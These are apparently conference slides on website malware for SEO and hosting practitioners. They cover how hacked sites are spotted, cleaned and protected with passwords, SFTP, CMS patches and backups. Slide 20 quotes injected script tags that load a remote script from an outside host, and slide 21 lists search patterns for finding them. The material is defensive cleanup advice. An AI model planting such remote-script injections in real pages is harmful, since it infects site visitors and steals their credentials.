2. About Scott Hendison
• Began “hosting“ websites in 1997 with one server in
our retail computer store, with standard DSL
• Grew to 11 servers then switched to a sort of
“datacenter co-op“ a few years ago, all in the same
local facility in Gresham Oregon.
• Not our primary business, but we still host over 1000
domains today, as well as maintain end-user hosting
accounts on several major hosts.
3. Web Hosting and SEO
• I've been on this panel three times and discussed –
– shared vs. dedicated servers
– Static vs. shared IP addresses
– Apache 1 vs Apache 2
– Apache vs. Windows
– .htaccess
– mod_rewrite
– Windows IIS rewriting options
– Server speed and performance
– and other riveting subjects trying to better relate to SEO
4. Web Hosting and SEO
Speed and Performance
• I “predicted” at Pubcon 2009 that speed will soon matter
for organic, then Matt Cutts announced next day
• Not a risky prediction, considering Adwords Quality Scores
• Speed as ranking factor began “counting” April 9, 2010
• Google has two great tools
– Page Speed for Firefox – (download inside Webmaster Tools)
– Google Chrome (right click in Chrome and “inspect element”)
5. But I‘m Not Talking About Speed
• Far more important
• The #1 killer of websites
• The thing that drives visitors away in droves
• Drains PPC money as fast as possible
• Google stops people from even arriving at your site!
• I’m talking about…
7. Malware
• Nothing can fully protect users from getting viruses
• Viruses can steal the BEST passwords & logins
• If you don’t get one, contractors, employees or family
probably will, infecting your network.
• People should use index cards and a fireproof safe
• But that’s pretty unrealistic, so learn to deal with disasters
8. Malware identification
• Nearly 15% of “our” sites were hacked in 2010
• Most were self inflicted through laziness and stupidity
• The hacks really didn’t vary all that much
• Getting rid of hacks can be a headache
• Getting back into Google isn’t very difficult
• Protecting yourself FROM hacks is getting easier, but…
• Sadly, the hacking keeps getting easier…
10. Identification
• You can get notified by a client or customer
• You discover it in a browser or AV warning
• You can see your site flagged in the SERPS
• You can get notified by Google WMT – (sometimes)
14. #1 Conversion Killer
• Nothing hurts you more than if people wont
come to your site in the first place.
• Once you‘ve identified a problem, what can
you do?
– Clean up the offending code
– Beg Google for a clean bill of health
15. Removal
• Most hacks we saw were pretty similar
• Cross Site Scripting (XSS) and SQL Injection
• Adding links and adding hosted scripts
• Hackers want to add links to your site
• Hackers want to add scripts to infect users with
viruses which in turn, steal more passwords
• Not too technical - Look for strange javascripts!
18. Removal
• If WMT is no help, then look at files manually
• Use backups and file comparison tools
• Check recent change dates
• Look for things that don‘t belong, often in
pages named index, home, and default - in
.php and .html extensions
• Look in headers and footers too
20. Removal
• Usually index, home, header and footer –
<script
src=http://domainX.ac.jp/course/VIVID.php
></script>
• And in most or all javascript files -
document.write('<script
src=http://domainX.ac.jp/course/VIVID.php
></script>');"
21. Removal
• Not all that complicated, just tedious.
• Search files for <script src=http:// and make
sure you recognize them all, and search for
eval(base64 too.
• Overly simplistic to say “clean it up“ but others
have likely had your same problem.
• Google for it w/ quotes to find YOUR exact code.
• Get a quick look at your site w/ free tool at
http://UnmaskParasites.com
23. Once You‘re Clean
Write something like this –
Thank you for identifying our malware
problem, and we believe all is now cleaned
up. We have verified that we're clean using
an online scanner -
http://www.unmaskparasites.com - and
would appreciate a speedy resolution.
Thank you,
Scott Hendison
24. Once You‘re Clean
• Document your process and improve it
• Get ready to have it happen again
• Begin to protect yourself – Get paranoid.
25. Prevention
• FTP Passwords
– Don't share FTP access – make new users instead.
– NEVER use a dictionary word in the password
– Use at least 8 characters (some people will say 20+)
– Mix Upper Case, Lower Case, numerals and symbols
– CHANGE passwords without telling your dev people
every few months.
• Stop using plain old FTP - WinSCP is free SFTP
26. Prevention
• Using a CMS?
• Find the documentation on locking it down
• Do ALL system updates
• Do ALL released security patches
• Routine maintenance (just like WMT & Analytics)
• More popular = more vulnerable, like WordPress
27. Prevention
• Nearly 8% of all sites are now WordPress*
• We work in Wordpress 95% of the time
• Same thing that makes it great makes it riskier
• Amazing plugins have been developed for safety
• Common threats have easy solutions
* Supposedly said my Matt Mullenweg at one of the 2010 WordCamp, but I can‘t prove it.
32. Prevention
• Total prevention may be impossible. Be prepared!
• Backup restoration sometimes faster than repair
• Hosts can may keep backups 7 days, or even less!
• Get weekly (or daily) backups in place & off-host
• Store a year of monthly backups at AWS
• Document the entire restore process and TEST
• Your site hack is generally not the webhosts fault!
33. Take-aways
• FAR more important than your SEO
• Dig into Webmaster Tools malware area
• Change all FTP Passwords asap, & consider SFTP
• Check for updated versions on forms, and on
your CMS
• Get backup and restore processes in place NOW
34. Thank You
WordPress Lunch Table Thursday 1:30
Scott Hendison
Search Commander, Inc.
shendison@seoautomatic.com